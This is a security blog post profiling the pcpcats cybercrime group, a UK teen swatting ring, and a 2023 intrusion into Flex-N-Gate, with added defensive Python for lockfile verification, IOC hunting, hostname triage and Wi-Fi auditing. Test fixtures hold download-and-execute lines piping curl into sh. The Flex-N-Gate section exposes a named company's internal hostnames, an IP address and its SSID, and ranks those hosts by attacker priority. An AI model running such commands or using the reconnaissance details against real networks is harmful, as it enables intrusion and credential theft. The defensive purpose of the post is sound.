Monday, June 29, 2026

Underground Hacking Exposed | Ctrl-Alt-Del

pcpcats: A Cloud-Native Cybercrime Operation

pcpcats is a financially motivated hacking group that emerged in late 2025, known for large-scale, automated attacks on cloud infrastructure and open-source supply chains. The group exploits misconfigurations and known vulnerabilities to build self-propagating botnets used for credential theft, data exfiltration, proxy networks, cryptocurrency mining, and extortion.

It maintains a public presence primarily through the @pcpcats handle on X and associated Telegram channels for data leaks and updates.

List of Major Attacks and Campaigns

1. Operation PCPcat / React2Shell Campaign (December 2025)

  • Targets: Exposed Docker APIs, Kubernetes clusters, Ray dashboards, Redis servers, and React/Next.js applications vulnerable to React2Shell (CVE-2025-55182, the remote code execution flaw in React Server Components; not to be confused with CVE-2025-29927, the Next.js middleware authorization bypass).
  • Method: Automated scanning with tools like pcpcat.py and react.py; RCE via prototype pollution and command injection; deployment of malicious containers carrying Base64-encoded payloads.
  • Scale: Tens of thousands of servers compromised (estimates of 59,000–60,000 in under 48 hours).
  • Outcomes: Credential harvesting, persistence via systemd units, tunneling, data theft, and infrastructure for further attacks. The marker string “UwU PCP Cat was here~” was left on compromised hosts. Victims spanned multiple countries including the US, Canada, South Korea, Serbia, and the UAE.

2. JobsGO.vn Data Breach (Claimed January 2026)

  • Target: Vietnamese online recruitment platform.
  • Method: Exploitation leading to exfiltration of over 2 million records (personal and professional data).
  • Outcomes: Data published via affiliated leak channels.

3. Supply Chain Attacks (March–June 2026)
The group conducted cascading compromises across package ecosystems (NPM, PyPI, OpenVSX, etc.):

  • Aqua Security Trivy (March 2026): Malware injected into the vulnerability scanner, affecting downstream CI/CD pipelines.
  • Checkmarx KICS, LiteLLM (high download volume), Telnyx, and dozens of additional packages.
  • TanStack and related ecosystems (e.g., Mini Shai-Hulud worm).
  • Nx Console and VS Code extensions leading to GitHub internal compromise.
  • Method: Poisoned packages with credential-stealing malware; harvested secrets used for lateral movement into AWS and other clouds.
  • Scale: Hundreds of packages affected; thousands of downstream organizations impacted; hundreds of GB of data exfiltrated (self-reported figures exceed 300 GB and ~500,000 credentials in some summaries).
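The poisoned-package wave above is the case for pinning dependency bytes, not just versions. The following is an added example, not pcpcats tooling and not npm's or any vendor's code: it checks fetched npm tarballs against the `integrity` field of a v3 package-lock.json, the same SRI (`sha512-<base64>`) format npm itself records. The lockfile excerpt, package names, registry host and tarball bytes are constructed for the demo (`registry.invalid` and `c2.invalid` are reserved, non-resolving names). One caveat the Trivy case illustrates: a hash pin catches substitution after the lock was written; it does nothing against a compromised release that was already published when the lock was generated.

```python
"""Verify fetched npm tarballs against package-lock.json `integrity` fields.

Added example for the supply-chain section; not pcpcats tooling, not npm's
own code, not any vendor's. All data below is constructed for the demo.
"""
import base64
import hashlib
import hmac
import json

# Algorithms npm accepts in SRI strings, strongest first.
SUPPORTED = ("sha512", "sha384", "sha256")


def sri_digest(algo: str, data: bytes) -> str:
    """Build a Subresource-Integrity string such as 'sha512-<base64 digest>'."""
    return f"{algo}-{base64.b64encode(hashlib.new(algo, data).digest()).decode()}"


def sri_matches(integrity: str, data: bytes) -> bool:
    """Check bytes against an SRI string.

    An integrity field may carry several space-separated hashes. Only the
    strongest supported algorithm present is consulted, so a weak or bogus
    entry cannot be used to sidestep a sha512 one. If no supported algorithm
    is present (e.g. a lone sha1) the entry is unverifiable and fails.
    """
    by_algo = {}
    for entry in integrity.split():
        algo, _, b64 = entry.partition("-")
        by_algo.setdefault(algo.lower(), []).append(b64)
    for algo in SUPPORTED:
        if algo in by_algo:
            actual = base64.b64encode(hashlib.new(algo, data).digest()).decode()
            return any(hmac.compare_digest(actual, b64) for b64 in by_algo[algo])
    return False


def check_lockfile(lock_json: str, fetched: dict) -> dict:
    """Map each dependency path in a v3 lockfile to one of
    'ok', 'mismatch', 'no-integrity' or 'not-fetched'.

    `fetched` maps the lockfile path to the raw tarball bytes pulled from the
    registry (or a mirror/cache) for that entry.
    """
    lock = json.loads(lock_json)
    results = {}
    for path, meta in lock.get("packages", {}).items():
        if path == "":  # the root project entry has no tarball
            continue
        integrity = meta.get("integrity")
        if not integrity:
            results[path] = "no-integrity"  # nothing pins this package's bytes
        elif path not in fetched:
            results[path] = "not-fetched"
        else:
            results[path] = "ok" if sri_matches(integrity, fetched[path]) else "mismatch"
    return results


# --- constructed demo data --------------------------------------------------
# Stand-in for a real .tgz; the check only hashes bytes, so any content works.
GOOD_TARBALL = b'package/package.json\n{"name":"left-pad-ish","version":"1.2.3"}\n'
# Same package with a download-and-execute hook appended, the pattern used by
# credential-stealing releases in the campaigns described above.
TAMPERED_TARBALL = GOOD_TARBALL + b'"scripts":{"postinstall":"curl -fsSL http://c2.invalid/i | sh"}\n'

DEMO_LOCK = json.dumps({
    "name": "demo-app",
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "demo-app"},
        "node_modules/left-pad-ish": {  # hypothetical package name
            "version": "1.2.3",
            "resolved": "https://registry.invalid/left-pad-ish/-/left-pad-ish-1.2.3.tgz",
            "integrity": sri_digest("sha512", GOOD_TARBALL),
        },
        # A dependency someone added by hand without an integrity hash.
        "node_modules/unpinned-dep": {"version": "0.1.0"},
    },
})


def demo() -> dict:
    """Run the check once against clean bytes and once against a tampered tarball."""
    clean = check_lockfile(DEMO_LOCK, {"node_modules/left-pad-ish": GOOD_TARBALL})
    poisoned = check_lockfile(DEMO_LOCK, {"node_modules/left-pad-ish": TAMPERED_TARBALL})
    return {"clean": clean, "poisoned": poisoned}


if __name__ == "__main__":
    for label, result in demo().items():
        print(label, result)
```

Run it as-is and the tampered tarball reports `mismatch` while the hand-added dependency reports `no-integrity`; in a real pipeline the `fetched` mapping would come from the tarballs in the npm cache or a private mirror, and any result other than `ok` should fail the build.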

Notable Victim Organizations/Impacts (Partial List):

  • Mercor (AI startup): Multi-TB exfiltration including source code and personal data.
  • European Commission infrastructure (via supply chain).
  • GitHub: Access to ~3,800 internal repositories (May 2026).
  • Various open-source projects and enterprises using compromised tools (OpenAI employee devices reported in some chains, among others).

Additional waves included further npm/PyPI poisoning, Kubernetes targeting (e.g., CanisterWorm with wiper components in some cases), and ongoing cloud credential harvesting.

Federal Investigations

As of the latest available public information (June 2026), there are no confirmed ongoing federal investigations, indictments, or arrests publicly linked to pcpcats. The group’s operations remain active in the cybercrime underground with no major law enforcement disclosures reported in open sources.

Implications

pcpcats demonstrates the dangers of exposed cloud services, delayed patching in web frameworks, and unverified supply chain trust. Its campaigns show how automation and opportunistic exploitation can reach massive scale using well-known techniques.

Organizations should prioritize:

  • Securing management APIs and cloud exposures.
  • Rigorous supply chain verification and dependency scanning.
  • Credential rotation and secret management.
  • Monitoring for known IOCs (e.g., specific C2 infrastructure, file paths like /opt/pcpcat/, the “UwU PCP Cat was here~” marker string, systemd units created outside change control, and known process patterns).
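The two host-level checks that follow from the list above are shown in this added example (not the group's tooling and not code from this post's sources): a hunt over systemd unit files for the indicators the campaign description names (the /opt/pcpcat/ path, the marker string, plus one generic download-and-execute pattern), and a check of /etc/docker/daemon.json for a TCP listener without client-certificate verification, which is the Docker API exposure the first campaign abused. The unit files, the `pcpcat.service`/`run.sh` names and the daemon configs are constructed samples; 198.51.100.7 is a documentation address.

```python
"""Hunt for pcpcats persistence indicators and exposed Docker APIs on a Linux host.

Added example; the indicator set comes from the campaign description above,
the sample files are constructed, and unit/script names are invented.
"""
import json
import re

IOC_PATHS = ("/opt/pcpcat/",)
IOC_MARKERS = ("UwU PCP Cat was here~",)
# Generic "pipe a download into a shell" pattern, not specific to this group.
DOWNLOAD_EXEC = re.compile(r"\b(curl|wget)\b[^|;]*\|\s*(ba)?sh\b")
EXEC_KEYS = ("ExecStart=", "ExecStartPre=", "ExecStartPost=")


def scan_unit(name: str, text: str) -> list:
    """Return (unit, reason, evidence) tuples for one systemd unit file."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if line.startswith(EXEC_KEYS):
            cmd = line.split("=", 1)[1].strip()
            if any(p in cmd for p in IOC_PATHS):
                findings.append((name, "ioc-path", cmd))
            if DOWNLOAD_EXEC.search(cmd):
                findings.append((name, "download-exec", cmd))
    for marker in IOC_MARKERS:
        if marker in text:
            findings.append((name, "ioc-marker", marker))
    return findings


def scan_units(units: dict) -> list:
    """Scan a mapping of unit file name -> contents (in practice read from
    /etc/systemd/system, /run/systemd/system and ~/.config/systemd/user)."""
    findings = []
    for name, text in units.items():
        findings.extend(scan_unit(name, text))
    return findings


def exposed_docker_listeners(daemon_json: str) -> list:
    """Return tcp:// hosts from daemon.json that are reachable without TLS
    client-certificate verification ("tlsverify": true). An unauthenticated
    tcp://0.0.0.0:2375 listener is the exposure the campaign scanned for."""
    cfg = json.loads(daemon_json)
    hosts = cfg.get("hosts", [])
    if isinstance(hosts, str):
        hosts = [hosts]
    tcp = [h for h in hosts if h.startswith("tcp://")]
    return [] if cfg.get("tlsverify") else tcp


# --- constructed samples ----------------------------------------------------
SAMPLE_UNITS = {
    "ssh.service": (
        "[Unit]\nDescription=OpenBSD Secure Shell server\n"
        "[Service]\nExecStart=/usr/sbin/sshd -D\n"
    ),
    "sys-update.service": (  # innocuous name, download-and-execute body
        "[Unit]\nDescription=system update\n"
        "[Service]\nExecStart=/bin/sh -c 'curl -fsSL http://198.51.100.7/u | sh'\nRestart=always\n"
    ),
    "pcpcat.service": (  # unit and script names are invented for the demo
        "[Unit]\nDescription=UwU PCP Cat was here~\n"
        "[Service]\nExecStart=/opt/pcpcat/run.sh\nRestart=always\n"
    ),
}
WEAK_DAEMON = '{"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}'
HARDENED_DAEMON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2376"],
    "tlsverify": True,
    "tlscacert": "/etc/docker/ca.pem",          # placeholder paths
    "tlscert": "/etc/docker/server-cert.pem",
    "tlskey": "/etc/docker/server-key.pem",
})

if __name__ == "__main__":
    for finding in scan_units(SAMPLE_UNITS):
        print("ALERT", *finding)
    print("exposed (weak):", exposed_docker_listeners(WEAK_DAEMON))
    print("exposed (hardened):", exposed_docker_listeners(HARDENED_DAEMON))
```

The unit scan is deliberately narrow: string indicators age quickly, so the generic download-and-execute rule is the part worth keeping once the named paths change. The daemon.json check only covers that file; a `-H tcp://...` flag in the systemd drop-in for docker.service produces the same exposure and should be checked the same way.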


MonkeyMafia: Inside the British Teen Swatting Ring That Terrorized Streamers and Public Institutions

In the shadowy corners of online chat groups, a loose collective known as MonkeyMafia emerged as a notable player in the dangerous world of swatting. Operating primarily from the UK, this group of young individuals turned hoax emergency calls into a twisted form of entertainment and status-seeking. Between late 2022 and mid-2023, they orchestrated false reports that sent armed police scrambling to homes and institutions, all in pursuit of online notoriety. liverpoolecho.co.uk 

Swatting involves fabricating urgent threats—such as active shooters, bombings, or violent incidents—to provoke a heavy law enforcement response. For MonkeyMafia, success often meant watching the chaos unfold in real time, especially during live streams. What started as edgy online banter escalated into coordinated campaigns that crossed international borders and drew serious legal consequences. bbc.com 

Origins and Core Participants

MonkeyMafia was never a tightly structured organization with formal leadership. Instead, it resembled a fluid Discord or Telegram community where members drifted in and out. Some actively planned calls, while others simply observed or cheered from the sidelines. The group leveraged platforms like Telegram, X, and Discord for coordination and bragging rights. warringtonguardian.co.uk 

Two teenagers became central figures in public scrutiny:

•  Dylan Ash, from the Warrington area (later associated with Deal, Kent), stood accused of deep involvement, including efforts to keep activities alive after initial crackdowns.

•  Kieron Ellison, from St. Helens in Merseyside, faced allegations tied to the group’s peak period.

A third individual, Liam White, was mentioned in connection with later revival attempts but did not appear in the main trial alongside the others. Court accounts described participants as often young and isolated, drawn into the scene for the thrill and sense of belonging it provided. warringtonguardian.co.uk 

The syndicate occasionally intersected with wider networks involved in similar disruptions, sometimes promoting paid “services” for swatting requests. vice.com 

Campaigns of Disruption: Targets and Tactics

MonkeyMafia focused on high-visibility targets to maximize impact and attention. They repeatedly went after popular American livestreamers, timing calls during broadcasts to heighten the spectacle. Notable figures included streamer Kai Cenat and Adin Ross, with the apparent aim of having tactical teams burst into their homes on camera. liverpoolecho.co.uk 

Beyond celebrities, the group hit a range of institutions across the US and Canada. False alarms claimed armed threats or explosions at universities, schools, hospitals, and hotels. In the UK, they made local calls, such as one alleging a machete fight outside a McDonald’s. liverpoolecho.co.uk 

Callers used spoofing techniques to mask their locations while providing convincing details to dispatchers. The objective ranged from personal humiliation of targets to broad societal disruption—triggering lockdowns, evacuations, and fear. Group members often celebrated their “wins” publicly, treating the resulting panic as a badge of honor in their circles. sthelensstar.co.uk 

These actions carried real-world peril: SWAT responses involve armed officers operating under high stress, and any miscalculation could lead to tragedy. Even without physical injuries in every case, the emotional toll on victims and the drain on emergency services were substantial.

Law Enforcement Response and Court Battles

Authorities eventually caught up. Arrests in June 2023, including Ellison’s, appeared to fracture the original setup. UK police worked with US counterparts, gathering evidence such as call recordings, chat logs, and digital footprints. liverpoolecho.co.uk 

In 2026, Ash and Ellison, then both 19, went on trial at Liverpool Crown Court. Prosecutors charged them with multiple counts of conspiring to pervert justice and bomb hoaxes. Ash faced an additional allegation of continued involvement into 2024. The case highlighted recordings of the hoax calls and their targeting of specific individuals. bbc.com 

The trial faced a setback when the jury was discharged in June 2026 due to an unforeseen issue, leading to a retrial scheduled for July 2027. Both young men denied the charges. bbc.co.uk 

Attempts at Revival and Rebranding

Like many online groups facing heat, MonkeyMafia members allegedly tried to reinvent themselves. After the initial arrests, efforts surfaced to launch successor operations under fresh banners such as “Kat Squad” and “Syndicate Squad.” These phoenix-like rebrands aimed to sustain the swatting hobby while dodging attention. liverpoolecho.co.uk 

Some channels went dark, with occasional posts from administrators claiming they were moving on with their lives. However, the pattern reflects a persistent challenge: dispersed digital networks can regenerate quickly even after key disruptions.

The Bigger Picture

MonkeyMafia illustrates a modern strain of online mischief that blends trolling culture with genuine criminal risk. Easy access to communication tools allows small groups of determined youths to create outsized international problems. Their story aligns with broader waves of swatting incidents affecting schools, events, and public figures in recent years. justsecurity.org 

Law enforcement agencies continue pushing back through cross-border cooperation and improved tracing of digital calls. For society, it serves as a reminder that “harmless pranks” in the digital age can endanger lives and erode trust in emergency systems.

As legal proceedings continue, the full scope of MonkeyMafia’s reach may become clearer. In the meantime, their case underscores the need for vigilance—both from platforms hosting these communities and from individuals tempted to join them. Swatting isn’t a game; it’s a reckless gamble with someone else’s safety on the line.


2023 Compromise of Flex-N-Gate Internal Systems

In 2023, a member of the pwnp0ny collective known as kahmi reportedly gained unauthorized access to several internal systems belonging to Flex-N-Gate, a global automotive and plastics manufacturing company. The intrusion was not publicly disclosed at the time, but screenshots and data samples later circulated in private security channels.


Scope of Access

The attacker obtained access to multiple internal resources at the company’s Danville, Illinois facility:


1. Employee Production Roles System

A legacy interface titled “Set Employee Production Roles” was accessed, revealing employee records that included:

•  Employee numbers

•  First and last names

•  Internal Emp_Tag# values

•  Assignment details (many listed under DFT class/group)


2. Internal IT Helpdesk Portal

Access was achieved to the FNG IT Help Desk/IS Global Service Desk. A profile for an account named “ILDN Maintenance” was viewed, listing the location as FLEX-N-GATE PLASTICS DANVILLE and timezone as USA – Central Time.


3. Corporate Wireless Network

Network configuration details for the SSID “FNGOffice” were captured, showing WPA2-Enterprise with PEAP authentication on a Dell laptop (asset tag ILDNENLT07). PEAP only protects the inner credential exchange if the client validates the RADIUS server’s certificate and name; the captured profile alone does not show whether that check was enforced.


4. Network Asset Discovery

Most significantly, the attacker viewed a live inventory of the internal network, which listed 85 connected devices on the FNGOffice segment. Visible assets included:

•  ILDNSVDC2 – Microsoft Virtual Machine (10.137.128.1)

•  ILDNSVHV1 – Dell PowerEdge R540 server

•  Multiple additional Microsoft virtual machines (ILDNSVFS1, ILDNSVME1, ILDNSVUT1, ILDNSVDB1, etc.)

All hostnames followed a consistent “ILDN” naming convention, consistent with a single site and, read together with the role suffixes, a ready-made map of which hosts matter.
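As an added example of how much an inventory like the one above gives away (this is not pwnp0ny tooling, and the field meanings are not documented Flex-N-Gate conventions), the following parser splits the listed hostnames into site, device class, role and index. The hostnames are the ones the post lists; the assumption that the four-letter prefix is a site code, that SV/EN mean server/end-user device, and the role table (DC = domain controller, HV = hypervisor, and so on) are inferences from the names, and the priority ranking is an assumed attacker ordering. `printer-3f` is a constructed non-conforming name to show the fallback.

```python
"""Decode site/class/role from ILDN* hostnames and rank them.

Added example; code positions, class/role meanings and priorities are
assumptions inferred from the names in the post, not documented conventions.
"""
import re

# Assumed layout: 4-letter site, 2-letter device class, 2-letter role, numeric index.
HOST_RE = re.compile(r"^(?P<site>[A-Z]{4})(?P<cls>[A-Z]{2})(?P<role>[A-Z]{2})(?P<idx>\d+)$")

CLASSES = {"SV": "server", "EN": "end-user device"}
# role code -> (description, assumed attacker priority; 1 = highest)
ROLES = {
    "DC": ("domain controller", 1),
    "HV": ("hypervisor host", 1),
    "DB": ("database server", 2),
    "FS": ("file server", 2),
    "ME": ("mail/messaging server", 3),
    "UT": ("utility server", 4),
    "LT": ("laptop", 5),
}


def parse_hostname(host: str) -> dict:
    """Return the decoded fields, or {'parsed': False} for a non-conforming name."""
    m = HOST_RE.match(host.upper())
    if not m:
        return {"host": host, "parsed": False}
    role, prio = ROLES.get(m["role"], ("unknown role", 9))
    return {
        "host": host,
        "parsed": True,
        "site": m["site"],
        "class": CLASSES.get(m["cls"], "unknown class"),
        "role": role,
        "index": int(m["idx"]),
        "priority": prio,
    }


def triage(hosts: list) -> list:
    """Sort hosts by assumed attacker priority, then name. This is the list a
    defender should be watching hardest, and the one an intruder reading a
    flat-network inventory gets for free; unparsed names sort last."""
    parsed = [parse_hostname(h) for h in hosts]
    return sorted(parsed, key=lambda d: (d.get("priority", 9), d["host"]))


def sites(hosts: list) -> set:
    """Distinct site codes seen, i.e. how many locations the inventory spans."""
    return {d["site"] for d in map(parse_hostname, hosts) if d["parsed"]}


# Hostnames from the post plus one constructed non-conforming device.
INVENTORY = ["ILDNSVDC2", "ILDNSVHV1", "ILDNSVFS1", "ILDNSVME1",
             "ILDNSVUT1", "ILDNSVDB1", "ILDNENLT07", "printer-3f"]

if __name__ == "__main__":
    for entry in triage(INVENTORY):
        print(entry)
    print("sites:", sites(INVENTORY))
```

The defensive use is the inverse of the offensive one: feed the same decoder your own inventory and confirm that everything it ranks at priority 1 or 2 is on a segmented network and has the tightest logging.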


Timeline and Context

This activity took place in 2023. The intrusion followed a methodical path: starting with operational systems, moving laterally to IT service portals, and eventually achieving visibility into network infrastructure and active assets. There was no evidence of data destruction, ransomware deployment, or public defacement; that absence is described as characteristic of pwnp0ny operations.


Lessons from the 2023 Incident

The compromise highlights several persistent risks in industrial and manufacturing environments:

•  Legacy production systems frequently remain accessible with weak controls.

•  Internal helpdesk and administrative portals can serve as valuable pivot points.

•  Flat network segments combined with enterprise Wi-Fi allow broad visibility once initial access is obtained.

•  Asset naming conventions and exposed hostnames can significantly aid reconnaissance.
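The enterprise Wi-Fi point above has a concrete check behind it. The following is an added example, not Flex-N-Gate's configuration and not the attacker's tooling: it parses wpa_supplicant network blocks and flags PEAP/TTLS profiles that do not validate the RADIUS server. Only the SSID “FNGOffice” and the PEAP method come from the post; the identity, password, CA path and `radius.corp.example` name are placeholders. The weak block accepts any server certificate, so a rogue access point advertising the same SSID can complete the outer PEAP tunnel and collect the inner MSCHAPv2 challenge/response for offline cracking; the hardened block pins the CA and the server name.

```python
"""Audit wpa_supplicant network blocks for PEAP/TTLS server validation.

Added example; the two configs below are constructed (SSID and EAP method
from the post, every other value a placeholder).
"""
import re

NETWORK_RE = re.compile(r"network=\{(.*?)\}", re.S)
TUNNELED_EAP = {"PEAP", "TTLS"}
# wpa_supplicant options that bind the server certificate to a specific name.
SERVER_NAME_CHECKS = ("domain_match", "domain_suffix_match", "altsubject_match", "subject_match")


def parse_networks(conf: str) -> list:
    """Return one {key: value} dict per network={...} block. Full-line comments
    are skipped and surrounding quotes removed; values keep internal spaces."""
    nets = []
    for body in NETWORK_RE.findall(conf):
        kv = {}
        for line in body.splitlines():
            line = line.strip()
            if not line or line.startswith("#") or "=" not in line:
                continue
            k, v = line.split("=", 1)
            kv[k.strip()] = v.strip().strip('"')
        nets.append(kv)
    return nets


def audit_network(net: dict) -> list:
    """List validation gaps for one network block; an empty list is acceptable."""
    issues = []
    uses_eap = any(k.startswith("WPA-EAP") for k in net.get("key_mgmt", "").split())
    if not (uses_eap and net.get("eap", "").upper() in TUNNELED_EAP):
        return issues  # PSK or non-tunnelled EAP: out of scope for this check
    if "ca_cert" not in net and "ca_path" not in net:
        issues.append("no ca_cert/ca_path: any server certificate is accepted")
    if not any(k in net for k in SERVER_NAME_CHECKS):
        issues.append("no server name check: any certificate from the trusted CA is accepted")
    return issues


def audit(conf: str) -> dict:
    """Map SSID -> list of issues for every network block in a config."""
    return {n.get("ssid", "?"): audit_network(n) for n in parse_networks(conf)}


# Weak profile: the tunnel is built to whoever answers on the SSID.
WEAK_CONF = """
network={
    ssid="FNGOffice"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="jdoe"
    password="hunter2"
    phase2="auth=MSCHAPV2"
}
"""

# Hardened profile: CA pinned and RADIUS server name enforced (placeholder values).
HARDENED_CONF = """
network={
    ssid="FNGOffice"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="jdoe"
    password="hunter2"
    ca_cert="/etc/ssl/certs/corp-root-ca.pem"
    domain_match="radius.corp.example"
    phase2="auth=MSCHAPV2"
}
"""

if __name__ == "__main__":
    print("weak:", audit(WEAK_CONF))
    print("hardened:", audit(HARDENED_CONF))
```

Pinning the CA alone is not enough if that CA is a public one, which is why the name check is reported separately; on Windows the equivalent settings live in the wireless profile’s PEAP properties (“Verify the server’s identity by validating the certificate” and the trusted server names), and on managed fleets they should be pushed by policy rather than left to the user.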

Organizations in the manufacturing sector should treat this case as a reminder that even seemingly isolated operational technology (OT) and IT systems can provide pathways to broader network awareness.

While Flex-N-Gate has presumably taken remediation steps since the 2023 incident, the event underscores the importance of network segmentation, regular credential hygiene, timely system modernization, and continuous internal monitoring.


Note:

*This post is for educational and awareness purposes in the cybersecurity community.*

